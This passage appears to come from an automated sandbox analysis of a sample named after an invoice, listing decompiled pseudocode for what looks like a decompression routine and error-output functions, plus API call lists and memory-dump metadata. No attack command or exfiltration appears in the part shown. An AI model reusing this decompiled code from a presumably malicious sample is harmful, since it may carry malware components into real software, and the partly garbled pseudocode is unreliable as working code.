    				signed int _t389;
    				signed int _t395;
    				signed int _t411;
    				intOrPtr _t422;
    				signed int _t426;
    				signed int _t435;
    				void* _t448;
    				signed int _t458;
    				char _t460;
    				signed int _t474;
    				char* _t503;
    				signed int _t508;
    				signed int _t616;
    				signed int _t617;
    				signed int _t618;
    				signed int _t622;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 =  *((intOrPtr*)(_v8 + 0x10));
    				_v24 = 0;
    				_v32 = (1 <<  *(_v8 + 8)) - 1;
    				_v36 = (1 <<  *(_v8 + 4)) - 1;
    				_v40 =  *_v8;
    				_t617 =  *((intOrPtr*)(_v8 + 0x34));
    				_t474 =  *(_v8 + 0x44);
    				_v44 =  *((intOrPtr*)(_v8 + 0x38));
    				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
    				_v52 =  *((intOrPtr*)(_v8 + 0x40));
    				_v56 =  *((intOrPtr*)(_v8 + 0x48));
    				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
    				_v64 =  *((intOrPtr*)(_v8 + 0x30));
    				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
    				_v72 =  *((intOrPtr*)(_v8 + 0xc));
    				_t616 =  *((intOrPtr*)(_v8 + 0x28));
    				_v128 =  *((intOrPtr*)(_v8 + 0x20));
    				_v124 =  *((intOrPtr*)(_v8 + 0x24));
    				_v120 = _v12;
    				_v136 =  *((intOrPtr*)(_v8 + 0x14));
    				_v132 =  *((intOrPtr*)(_v8 + 0x18));
    				 *_a4 = 0;
    				if(_v56 == 0xffffffff) {
    					return 0;
    				}
    				__eflags = _v72;
    				if(_v72 == 0) {
    					_v68 =  &_v76;
    					_v72 = 1;
    					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
    				}
    				__eflags = _v56 - 0xfffffffe;
    				if(_v56 != 0xfffffffe) {
    					L12:
    					_v108 = _v16 + _v24;
    					while(1) {
    						__eflags = _v56;
    						if(_v56 == 0) {
    							break;
    						}
    						__eflags = _v24 - _a8;
    						if(_v24 < _a8) {
    							_t458 = _t616 - _t617;
    							__eflags = _t458 - _v72;
    							if(_t458 >= _v72) {
    								_t458 = _t458 + _v72;
    								__eflags = _t458;
    							}
    							_t460 =  *((intOrPtr*)(_v68 + _t458));
    							 *((char*)(_v68 + _t616)) = _t460;
    							 *_v108 = _t460;
    							_v24 = _v24 + 1;
    							_v108 = _v108 + 1;
    							_t616 = _t616 + 1;
    							__eflags = _t616 - _v72;
    							if(_t616 == _v72) {
    								_t616 = 0;
    								__eflags = 0;
    							}
    							_t116 =  &_v56;
    							 *_t116 = _v56 - 1;
    							__eflags =  *_t116;
    							continue;
    						}
    						break;
    					}
    					__eflags = _t616;
    					if(_t616 != 0) {
    						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
    					} else {
    						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
    					}
    					__eflags = 0;
    					_v116 = 0;
    					_v112 = 0;
    					while(1) {
    						L24:
    						_v108 = _v16 + _v24;
    						__eflags = _v24 - _a8;
    						if(_v24 >= _a8) {
    							break;
    						} else {
    							goto L25;
    						}
    						while(1) {
    							L25:
    							_v88 = _v24 + _v60 & _v32;
    							__eflags = _v116;
    							if(_v116 != 0) {
    								break;
    							}
    							__eflags = _v112;
    							if(_v112 == 0) {
    								_t370 = E0040D094((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
    								__eflags = _t370;
    								if(_t370 != 0) {
    									_t375 = E0040D094(_t474 + _t474 + _v20 + 0x180,  &_v136);
    									__eflags = _t375 != 1;
    									if(_t375 != 1) {
    										_v52 = _v48;
    										_v48 = _v44;
    										_v44 = _t617;
    										__eflags = _t474 - 7;
    										if(__eflags >= 0) {
    											_t377 = 0xa;
    										} else {
    											_t377 = 7;
    										}
    										_t474 = _t377;
    										_v56 = E0040D244(_v20 + 0x664, _v88,  &_v136, __eflags);
    										_t503 =  &_v136;
    										__eflags = _v56 - 4;
    										if(_v56 >= 4) {
    											_t381 = 3;
    										} else {
    											_t381 = _v56;
    										}
    										_v100 = E0040D11C((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
    										__eflags = _v100 - 4;
    										if(_v100 < 4) {
    											_t618 = _v100;
    										} else {
    											_v104 = (_v100 >> 1) - 1;
    											_t524 = _v104;
    											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
    											__eflags = _v100 - 0xe;
    											if(_v100 >= 0xe) {
    												_t395 = E0040D034( &_v136, _t524, _v104 + 0xfffffffc);
    												_t618 = _t622 + (_t395 << 4) + E0040D160(_v20 + 0x644,  &_v136, 4);
    											} else {
    												_t618 = _t622 + E0040D160(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
    											}
    										}
    										_t617 = _t618 + 1;
    										__eflags = _t617;
    										if(_t617 != 0) {
    											L82:
    											_v56 = _v56 + 2;
    											__eflags = _t617 - _v64;
    											if(_t617 <= _v64) {
    												__eflags = _v72 - _v64 - _v56;
    												if(_v72 - _v64 <= _v56) {
    													_v64 = _v72;
    												} else {
    													_v64 = _v64 + _v56;
    												}
    												while(1) {
    													_t389 = _t616 - _t617;
    													__eflags = _t389 - _v72;
    													if(_t389 >= _v72) {
    														_t389 = _t389 + _v72;
    														__eflags = _t389;
    													}
    													_v25 =  *((intOrPtr*)(_v68 + _t389));
    													 *((char*)(_v68 + _t616)) = _v25;
    													_t616 = _t616 + 1;
    													__eflags = _t616 - _v72;
    													if(_t616 == _v72) {
    														_t616 = 0;
    														__eflags = 0;
    													}
    													_v56 = _v56 - 1;
    													 *_v108 = _v25;
    													_v24 = _v24 + 1;
    													_v108 = _v108 + 1;
    													__eflags = _v56;
    													if(_v56 == 0) {
    														break;
    													}
    													__eflags = _v24 - _a8;
    													if(_v24 < _a8) {
    														continue;
    													}
    													break;
    												}
    												L93:
    												__eflags = _v24 - _a8;
    												if(_v24 < _a8) {
    													continue;
    												}
    												goto L94;
    											}
    											return 1;
    										} else {
    											_v56 = 0xffffffff;
    											goto L94;
    										}
    									}
    									_t411 = E0040D094(_t474 + _t474 + _v20 + 0x198,  &_v136);
    									__eflags = _t411;
    									if(_t411 != 0) {
    										__eflags = E0040D094(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
    										if(__eflags != 0) {
    											__eflags = E0040D094(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
    											if(__eflags != 0) {
    												_t422 = _v52;
    												_v52 = _v48;
    											} else {
    												_t422 = _v48;
    											}
    											_v48 = _v44;
    										} else {
    											_t422 = _v44;
    										}
    										_v44 = _t617;
    										_t617 = _t422;
    										L65:
    										_v56 = E0040D244(_v20 + 0xa68, _v88,  &_v136, __eflags);
    										__eflags = _t474 - 7;
    										if(_t474 >= 7) {
    											_t426 = 0xb;
    										} else {
    											_t426 = 8;
    										}
    										_t474 = _t426;
    										goto L82;
    									}
    									__eflags = E0040D094((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
    									if(__eflags != 0) {
    										goto L65;
    									}
    									__eflags = _v64;
    									if(_v64 != 0) {
    										__eflags = _t474 - 7;
    										if(_t474 >= 7) {
    											_t508 = 0xb;
    										} else {
    											_t508 = 9;
    										}
    										_t474 = _t508;
    										_t435 = _t616 - _t617;
    										__eflags = _t435 - _v72;
    										if(_t435 >= _v72) {
    											_t435 = _t435 + _v72;
    											__eflags = _t435;
    										}
    										_v25 =  *((intOrPtr*)(_v68 + _t435));
    										 *((char*)(_v68 + _t616)) = _v25;
    										_t616 = _t616 + 1;
    										__eflags = _t616 - _v72;
    										if(_t616 == _v72) {
    											_t616 = 0;
    											__eflags = 0;
    										}
    										 *_v108 = _v25;
    										_v24 = _v24 + 1;
    										__eflags = _v64 - _v72;
    										if(_v64 < _v72) {
    											_v64 = _v64 + 1;
    										}
    										goto L24;
    									}
    									return 1;
    								}
    								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
    								__eflags = _t474 - 7;
    								if(__eflags < 0) {
    									_v25 = E0040D1A4(_t448,  &_v136, __eflags);
    								} else {
    									_v96 = _t616 - _t617;
    									__eflags = _v96 - _v72;
    									if(__eflags >= 0) {
    										_t161 =  &_v96;
    										 *_t161 = _v96 + _v72;
    										__eflags =  *_t161;
    									}
    									_v89 =  *((intOrPtr*)(_v68 + _v96));
    									_v25 = E0040D1D0(_t448, _v89,  &_v136, __eflags);
    								}
    								 *_v108 = _v25;
    								_v24 = _v24 + 1;
    								_v108 = _v108 + 1;
    								__eflags = _v64 - _v72;
    								if(_v64 < _v72) {
    									_t180 =  &_v64;
    									 *_t180 = _v64 + 1;
    									__eflags =  *_t180;
    								}
    								 *((char*)(_v68 + _t616)) = _v25;
    								_t616 = _t616 + 1;
    								__eflags = _t616 - _v72;
    								if(_t616 == _v72) {
    									_t616 = 0;
    									__eflags = 0;
    								}
    								__eflags = _t474 - 4;
    								if(_t474 >= 4) {
    									__eflags = _t474 - 0xa;
    									if(_t474 >= 0xa) {
    										_t474 = _t474 - 6;
    									} else {
    										_t474 = _t474 - 3;
    									}
    								} else {
    									_t474 = 0;
    								}
    								goto L93;
    							}
    							return 1;
    						}
    						return _v116;
    					}
    					L94:
    					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
    					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
    					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
    					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
    					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
    					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
    					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
    					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
    					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
    					 *(_v8 + 0x44) = _t474;
    					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
    					 *((char*)(_v8 + 0x4c)) = _v76;
    					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
    					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
    					 *_a4 = _v24;
    					__eflags = 0;
    					return 0;
    				}
    				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
    				_v84 = 0;
    				_v108 = _v20;
    				__eflags = _v84 - _v80;
    				if(_v84 >= _v80) {
    					L7:
    					_v52 = 1;
    					_v48 = 1;
    					_v44 = 1;
    					_t617 = 1;
    					_v60 = 0;
    					_v64 = 0;
    					_t474 = 0;
    					_t616 = 0;
    					 *((char*)(_v68 + _v72 - 1)) = 0;
    					E0040CFF4( &_v136);
    					__eflags = _v116;
    					if(_v116 != 0) {
    						return _v116;
    					}
    					__eflags = _v112;
    					if(_v112 == 0) {
    						__eflags = 0;
    						_v56 = 0;
    						goto L12;
    					} else {
    						return 1;
    					}
    				} else {
    					goto L6;
    				}
    				do {
    					L6:
    					 *_v108 = 0x400;
    					_v84 = _v84 + 1;
    					_v108 = _v108 + 2;
    					__eflags = _v84 - _v80;
    				} while (_v84 < _v80);
    				goto L7;
    			}
























































    0x0040d348
    0x0040d34b
    0x0040d34e
    0x0040d359
    0x0040d35c
    0x0040d36d
    0x0040d37e
    0x0040d386
    0x0040d38f
    0x0040d395
    0x0040d39b
    0x0040d3a4
    0x0040d3ad
    0x0040d3b6
    0x0040d3bf
    0x0040d3c8
    0x0040d3d1
    0x0040d3da
    0x0040d3e3
    0x0040d3e9
    0x0040d3f2
    0x0040d3f8
    0x0040d401
    0x0040d40f
    0x0040d415
    0x0040d41b
    0x00000000
    0x0040d41d
    0x0040d424
    0x0040d428
    0x0040d42d
    0x0040d430
    0x0040d43d
    0x0040d43d
    0x0040d440
    0x0040d444
    0x0040d4e5
    0x0040d4ee
    0x0040d523
    0x0040d523
    0x0040d527
    0x00000000
    0x00000000
    0x0040d52c
    0x0040d52f
    0x0040d4f5
    0x0040d4f7
    0x0040d4fa
    0x0040d4fc
    0x0040d4fc
    0x0040d4fc
    0x0040d509
    0x0040d50a
    0x0040d510
    0x0040d512
    0x0040d515
    0x0040d518
    0x0040d519
    0x0040d51c
    0x0040d51e
    0x0040d51e
    0x0040d51e
    0x0040d520
    0x0040d520
    0x0040d520
    0x00000000
    0x0040d520
    0x00000000
    0x0040d52f
    0x0040d531
    0x0040d533
    0x0040d54b
    0x0040d535
    0x0040d53f
    0x0040d53f
    0x0040d550
    0x0040d552
    0x0040d555
    0x0040d558
    0x0040d558
    0x0040d561
    0x0040d567
    0x0040d56a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040d570
    0x0040d570
    0x0040d579
    0x0040d57c
    0x0040d580
    0x00000000
    0x00000000
    0x0040d58a
    0x0040d58e
    0x0040d5b1
    0x0040d5b6
    0x0040d5b8
    0x0040d691
    0x0040d696
    0x0040d697
    0x0040d7d7
    0x0040d7dd
    0x0040d7e0
    0x0040d7e3
    0x0040d7e6
    0x0040d7ef
    0x0040d7e8
    0x0040d7e8
    0x0040d7e8
    0x0040d7f4
    0x0040d80c
    0x0040d80f
    0x0040d815
    0x0040d819
    0x0040d820
    0x0040d81b
    0x0040d81b
    0x0040d81b
    0x0040d83c
    0x0040d83f
    0x0040d843
    0x0040d8bc
    0x0040d845
    0x0040d84b
    0x0040d84e
    0x0040d85a
    0x0040d85c
    0x0040d860
    0x0040d896
    0x0040d8b8
    0x0040d862
    0x0040d886
    0x0040d886
    0x0040d860
    0x0040d8bf
    0x0040d8bf
    0x0040d8c0
    0x0040d8cb
    0x0040d8cb
    0x0040d8cf
    0x0040d8d2
    0x0040d8e4
    0x0040d8e7
    0x0040d8f4
    0x0040d8e9
    0x0040d8ec
    0x0040d8ec
    0x0040d8f7
    0x0040d8f9
    0x0040d8fb
    0x0040d8fe
    0x0040d900
    0x0040d900
    0x0040d900
    0x0040d909
    0x0040d912
    0x0040d915
    0x0040d916
    0x0040d919
    0x0040d91b
    0x0040d91b
    0x0040d91b
    0x0040d91d
    0x0040d926
    0x0040d928
    0x0040d92b
    0x0040d92e
    0x0040d932
    0x00000000
    0x00000000
    0x0040d937
    0x0040d93a
    0x00000000
    0x00000000
    0x00000000
    0x0040d93a
    0x0040d93c
    0x0040d93f
    0x0040d942
    0x00000000
    0x00000000
    0x00000000
    0x0040d942
    0x00000000
    0x0040d8c2
    0x0040d8c2
    0x00000000
    0x0040d8c2
    0x0040d8c0
    0x0040d6af
    0x0040d6b4
    0x0040d6b6
    0x0040d766
    0x0040d768
    0x0040d786
    0x0040d788
    0x0040d78f
    0x0040d795
    0x0040d78a
    0x0040d78a
    0x0040d78a
    0x0040d79b
    0x0040d76a
    0x0040d76a
    0x0040d76a
    0x0040d79e
    0x0040d7a1
    0x0040d7a3
    0x0040d7b9
    0x0040d7bc
    0x0040d7bf
    0x0040d7c8
    0x0040d7c1
    0x0040d7c1
    0x0040d7c1
    0x0040d7cd
    0x00000000
    0x0040d7cd
    0x0040d6dd
    0x0040d6df
    0x00000000
    0x00000000
    0x0040d6e5
    0x0040d6e9
    0x0040d6f5
    0x0040d6f8
    0x0040d701
    0x0040d6fa
    0x0040d6fa
    0x0040d6fa
    0x0040d706
    0x0040d70a
    0x0040d70c
    0x0040d70f
    0x0040d711
    0x0040d711
    0x0040d711
    0x0040d71a
    0x0040d723
    0x0040d726
    0x0040d727
    0x0040d72a
    0x0040d72c
    0x0040d72c
    0x0040d72c
    0x0040d734
    0x0040d736
    0x0040d73c
    0x0040d73f
    0x0040d745
    0x0040d745
    0x00000000
    0x0040d73f
    0x00000000
    0x0040d6eb
    0x0040d5e8
    0x0040d5ed
    0x0040d5f0
    0x0040d631
    0x0040d5f2
    0x0040d5f6
    0x0040d5fc
    0x0040d5ff
    0x0040d604
    0x0040d604
    0x0040d604
    0x0040d604
    0x0040d610
    0x0040d621
    0x0040d621
    0x0040d63a
    0x0040d63c
    0x0040d63f
    0x0040d645
    0x0040d648
    0x0040d64a
    0x0040d64a
    0x0040d64a
    0x0040d64a
    0x0040d653
    0x0040d656
    0x0040d657
    0x0040d65a
    0x0040d65c
    0x0040d65c
    0x0040d65c
    0x0040d65e
    0x0040d661
    0x0040d66a
    0x0040d66d
    0x0040d677
    0x0040d66f
    0x0040d66f
    0x0040d66f
    0x0040d663
    0x0040d663
    0x0040d663
    0x00000000
    0x0040d661
    0x00000000
    0x0040d590
    0x00000000
    0x0040d582
    0x0040d948
    0x0040d94e
    0x0040d957
    0x0040d95d
    0x0040d969
    0x0040d972
    0x0040d978
    0x0040d981
    0x0040d98a
    0x0040d993
    0x0040d999
    0x0040d9a2
    0x0040d9ab
    0x0040d9b7
    0x0040d9c0
    0x0040d9c9
    0x0040d9cb
    0x00000000
    0x0040d9cb
    0x0040d461
    0x0040d464
    0x0040d46c
    0x0040d472
    0x0040d475
    0x0040d48e
    0x0040d495
    0x0040d498
    0x0040d49b
    0x0040d49e
    0x0040d4a0
    0x0040d4a5
    0x0040d4a8
    0x0040d4b0
    0x0040d4b2
    0x0040d4bd
    0x0040d4c2
    0x0040d4c6
    0x00000000
    0x0040d4c8
    0x0040d4d0
    0x0040d4d4
    0x0040d4e0
    0x0040d4e2
    0x00000000
    0x0040d4d6
    0x00000000
    0x0040d4d6
    0x00000000
    0x00000000
    0x00000000
    0x0040d477
    0x0040d477
    0x0040d47a
    0x0040d47f
    0x0040d482
    0x0040d489
    0x0040d489
    0x00000000

    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 51%
    			E00402260(void* __eax, char* __edx) {
    				char* _t103;
    
    				_t103 = __edx;
    				_t39 = __eax + 1;
    				 *__edx = 0xffffffff89705f71;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = 0xbadbbd;
    				asm("sbb edi, 0xffffffff");
    				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
    				_t37 = _t103 + 1; // 0x1
    				return _t37;
    			}




    0x00402261
    0x00402263
    0x00402285
    0x0040228c
    0x0040229d
    0x004022a8
    0x004022b9
    0x004022c4
    0x004022d5
    0x004022e0
    0x004022f1
    0x004022fc
    0x0040230d
    0x00402318
    0x00402329
    0x00402334
    0x00402345
    0x00402350
    0x00402361
    0x00402369
    0x00402372
    0x00402374
    0x00402378

    Memory Dump Source
    • Source File: 00000002.00000002.12842280383.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.12842260256.00400000.00000002.sdmp
    • Associated: 00000002.00000002.12842384840.00412000.00000004.sdmp
    • Associated: 00000002.00000002.12842407813.00417000.00000004.sdmp
    • Associated: 00000002.00000002.12842428355.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_facture_1398665.jbxd
    C-Code - Quality: 65%
    			E004096AC(long __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
    				char* _v8;
    				long _v12;
    				short _v140;
    				short _v2188;
    				void* _t16;
    				char* _t18;
    				intOrPtr _t20;
    				intOrPtr _t22;
    				intOrPtr _t31;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				int _t60;
    				void* _t63;
    
    				_push(__ebx);
    				_push(__esi);
    				_v8 = 0;
    				_push(_t63);
    				_push(0x4097d1);
    				_push( *[fs:ecx]);
    				 *[fs:ecx] = _t63 + 0xfffff778;
    				_t60 = E004094C0(_t16, __ebx,  &_v2188, __edx, __edi, __esi, __fp0, 0x400);
    				_t18 =  *0x412c2c; // 0x41304c
    				if( *_t18 == 0) {
    					_t20 =  *0x412b48; // 0x406b84
    					_t12 = _t20 + 4; // 0xffe8
    					_t22 =  *0x415b48; // 0x400000
    					LoadStringW(E00405B90(_t22),  *_t12,  &_v140, 0x40);
    					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
    				} else {
    					_t31 =  *0x412b68; // 0x413324
    					E00402F6C(E0040317C(_t31));
    					WideCharToMultiByte(1, 0,  &_v2188, _t60, 0, 0, 0, 0);
    					 *((intOrPtr*)(__ebx + 0x458d53d8)) =  *((intOrPtr*)(__ebx + 0x458d53d8)) - 1;
    					asm("cld");
    					E00405AD8();
    					WideCharToMultiByte(1, 0,  &_v2188, _t60, _v8, __ebx, 0, 0);
    					WriteFile(GetStdHandle(0xfffffff4), _v8, __ebx,  &_v12, 0);
    					WriteFile(GetStdHandle(0xfffffff4), 0x4097ec, 2,  &_v12, 0);
    				}
    				_pop(_t55);
    				 *[fs:eax] = _t55;
    				_push(E004097D8);
    				_t56 =  *0x409688; // 0x40968c
    				return E00405AE4( &_v8, _t56);
    			}
















    0x004096b5
    0x004096b6
    0x004096b9
    0x004096be
    0x004096bf
    0x004096c4
    0x004096c7
    0x004096da
    0x004096dc
    0x004096e4
    0x00409782
    0x00409787
    0x0040978b
    0x00409796
    0x004097b0
    0x004096ea
    0x004096ea
    0x004096f4
    0x0040970d
    0x00409711
    0x00409717
    0x00409723
    0x00409740
    0x00409758
    0x00409772
    0x00409772
    0x004097b7
    0x004097ba
    0x004097bd
    0x004097c5
    0x004097d0

    APIs
      • Part of subcall function 004094C0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
      • Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
      • Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
      • Part of subcall function 004094C0: LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004097D1), ref: 0040970D
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409740
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409752
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00409758
    • GetStdHandle.KERNEL32(000000F4,004097EC,00000002,?,00000000,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0040976C
    • WriteFile.KERNEL32(00000000,000000F4,004097EC,00000002,?), ref: 00409772
    • LoadStringW.USER32(00000000,0000FFE8,?,00000040), ref: 00409796
    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 004097B0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 65%
    			E0040969F(void* __eax, long __ebx, void* __ecx, void* __edx, void* __edi, int __esi, void* __fp0, intOrPtr _a8) {
    				void* _v4;
    				long _v8;
    				intOrPtr _v16;
    				short _v140;
    				char _v1564;
    				char _v1636;
    				short _v2184;
    				short _v2188;
    				char _v2196;
    				intOrPtr* _t22;
    				long _t44;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				intOrPtr _t58;
    				int _t60;
    
    				_t60 = __esi;
    				_t44 = __ebx;
    				_t22 = __eax + 1;
    				 *_t22 =  *_t22 + __ecx;
    				_push(__ebx);
    				if( *_t22 >= 0) {
    					L9:
    					E00405AD8();
    					WideCharToMultiByte(1, 0,  &_v2184, _t60, _v4, _t44, 0, 0);
    					WriteFile(GetStdHandle(0xfffffff4), _v4, _t44,  &_v8, 0);
    					WriteFile(GetStdHandle(0xfffffff4), 0x4097ec, 2,  &_v8, 0);
    					goto L11;
    				} else {
    					_push(__ebp);
    					if(__eflags == 0) {
    						L8:
    						 *((intOrPtr*)(__ebx + 0x458d53d8)) =  *((intOrPtr*)(__ebx + 0x458d53d8)) - 1;
    						asm("cld");
    						goto L9;
    					} else {
    						asm("insb");
    						if(__eflags >= 0) {
    							E00408290(_v4,  &_v1564, _a8, __fp0);
    							E004080DC(_v4);
    							_t58 = 4;
    							 *[fs:eax] = _t58;
    							_push(E00409673);
    							return L00404C88( &_v1636);
    						} else {
    							asm("rcl byte [ebp-0x75], 0xec");
    							_push(__ebp);
    							__ebp = __esp;
    							__esp = __esp + 0xfffff778;
    							_push(__ebx);
    							_push(__esi);
    							__ecx = 0;
    							_v16 = 0;
    							__ecx = 0;
    							_push(__ebp);
    							_push(0x4097d1);
    							_push( *[fs:ecx]);
    							 *[fs:ecx] = __esp;
    							__ecx =  &_v2196;
    							__esi = __eax;
    							__eax =  *0x412c2c; // 0x41304c
    							__eflags =  *__eax;
    							if( *__eax == 0) {
    								__eax =  &_v140;
    								__eax =  *0x412b48; // 0x406b84
    								_t17 = __eax + 4; // 0xffe8
    								__eax =  *_t17;
    								__eax =  *0x415b48; // 0x400000
    								 &_v140 =  &_v2188;
    								__eax = MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
    							} else {
    								__eax =  *0x412b68; // 0x413324
    								 &_v2188 = WideCharToMultiByte(1, 0,  &_v2188, __esi, 0, 0, 0, 0);
    								goto L8;
    							}
    							L11:
    							__eflags = 0;
    							_pop(_t55);
    							 *[fs:eax] = _t55;
    							_push(E004097D8);
    							_t56 =  *0x409688; // 0x40968c
    							return E00405AE4( &_v4, _t56);
    						}
    					}
    				}
    			}


















    0x0040969f
    0x0040969f
    0x0040969f
    0x004096a0
    0x004096a2
    0x004096a3
    0x00409718
    0x00409723
    0x00409740
    0x00409758
    0x00409772
    0x00000000
    0x004096a5
    0x004096a5
    0x004096a6
    0x00409711
    0x00409711
    0x00409717
    0x00000000
    0x004096a8
    0x004096a8
    0x004096a9
    0x00409644
    0x0040964c
    0x00409655
    0x00409658
    0x0040965b
    0x0040966b
    0x004096ab
    0x004096ab
    0x004096ac
    0x004096ad
    0x004096af
    0x004096b5
    0x004096b6
    0x004096b7
    0x004096b9
    0x004096bc
    0x004096be
    0x004096bf
    0x004096c4
    0x004096c7
    0x004096cf
    0x004096da
    0x004096dc
    0x004096e1
    0x004096e4
    0x0040977b
    0x00409782
    0x00409787
    0x00409787
    0x0040978b
    0x004097a7
    0x004097b0
    0x004096ea
    0x004096ea
    0x0040970d
    0x00000000
    0x0040970d
    0x004097b5
    0x004097b5
    0x004097b7
    0x004097ba
    0x004097bd
    0x004097c5
    0x004097d0
    0x004097d0
    0x004096a9
    0x004096a6

    APIs
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004097D1), ref: 0040970D
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409740
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409752
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00409758
    • GetStdHandle.KERNEL32(000000F4,004097EC,00000002,?,00000000,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0040976C
    • WriteFile.KERNEL32(00000000,000000F4,004097EC,00000002,?), ref: 00409772
      • Part of subcall function 004094C0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040966C), ref: 004094F3
      • Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00409517
      • Part of subcall function 004094C0: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 00409532
      • Part of subcall function 004094C0: LoadStringW.USER32(00000000,0000FFE7,?,00000100), ref: 004095CD
    • LoadStringW.USER32(00000000,0000FFE8,?,00000040), ref: 00409796
    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 004097B0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
